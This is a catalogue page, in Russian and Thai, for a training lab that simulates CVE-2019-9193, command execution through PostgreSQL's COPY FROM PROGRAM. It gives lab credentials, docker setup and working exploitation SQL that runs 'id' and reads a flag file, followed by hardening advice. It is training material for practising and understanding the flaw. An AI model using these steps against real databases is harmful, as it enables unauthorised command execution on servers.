Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-9193-Home-Lab — Эта лаборатория имитирует CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE | Kitploit
Инструменты/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз ДанныхЛаборатории и Практика
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

Эта лаборатория имитирует CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE

Репозиторий
29 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

CVE20199193-2

Lab นี้จำลองช่องโหว่ CVE-2019-9193 ที่เกิดใน PostgreSQL เวอร์ชัน 9.3 - 11.2 ซึ่งเปิดให้ user ที่เป็น superuser หรือมี role pg_execute_server_program สามารถใช้คำสั่ง:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

เพื่อรันคำสั่ง OS ได้โดยตรง ส่งผลให้เกิด Remote Command Execution (RCE) หากผู้โจมตีสามารถเข้าถึงฐานข้อมูลได้

Lab นี้ให้คุณใช้ความสามารถดังกล่าวเพื่ออ่านไฟล์:

root@kitploit:~
/tmp/flag.txt

เป้าหมายของ Lab

  1. เชื่อมต่อ PostgreSQL ด้วย:
    • User: postgres
    • Password: sentinel7
    • Port: 5433
  2. ใช้ COPY FROM PROGRAM เพื่อรันคำสั่ง OS
  3. อ่าน flag จาก /tmp/flag.txt

การเริ่มต้น

root@kitploit:~
docker compose build
docker compose up -d

จากนั้นเชื่อมต่อฐานข้อมูล:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

ขั้นตอนโจมตี

1) สร้างตารางเก็บ output

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) ทดสอบ RCE ด้วยคำสั่ง id

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) อ่าน flag

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

ตัวอย่าง output:

root@kitploit:~
flag{SECRET}

ข้อแนะนำด้านความปลอดภัย

  • ห้ามใช้ user postgres กับแอปจริง
  • จำกัด role ไม่ให้มี pg_execute_server_program
  • ปิดหรือจำกัดการใช้ COPY PROGRAM
  • ป้องกัน SQLi ในระบบทั้งหมด

АНГЛИЙСКАЯ ВЕРСИЯ

CVE-2019-9193 — Удалённое выполнение команд через PostgreSQL COPY FROM PROGRAM

Эта лаборатория симулирует уязвимость CVE-2019-9193 в PostgreSQL версий 9.3–11.2, которая позволяет:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

выполнять команды ОС при запуске суперпользователем или ролью с привилегией pg_execute_server_program.

Ваша задача — воспользоваться этой возможностью для чтения:

root@kitploit:~
/tmp/flag.txt

Цель

  1. Подключиться к PostgreSQL:
    • Пользователь: postgres
    • Пароль: sentinel7
    • Порт хоста: 5433
  2. Использовать COPY FROM PROGRAM для:
    • Выполнения команд ОС
    • Получения флага

Начало работы

root@kitploit:~
docker compose build
docker compose up -d

Подключитесь через:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

Эксплуатация

1) Создать таблицу

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) Проверить RCE

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) Прочитать флаг

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

Замечания по безопасности

  • Никогда не запускайте приложения с использованием суперпользователя PostgreSQL
  • Не предоставляйте привилегию pg_execute_server_program без необходимости
  • Отключите или ограничьте использование COPY PROGRAM
  • Усилите защиту приложений от SQL-инъекций

Скачать инструмент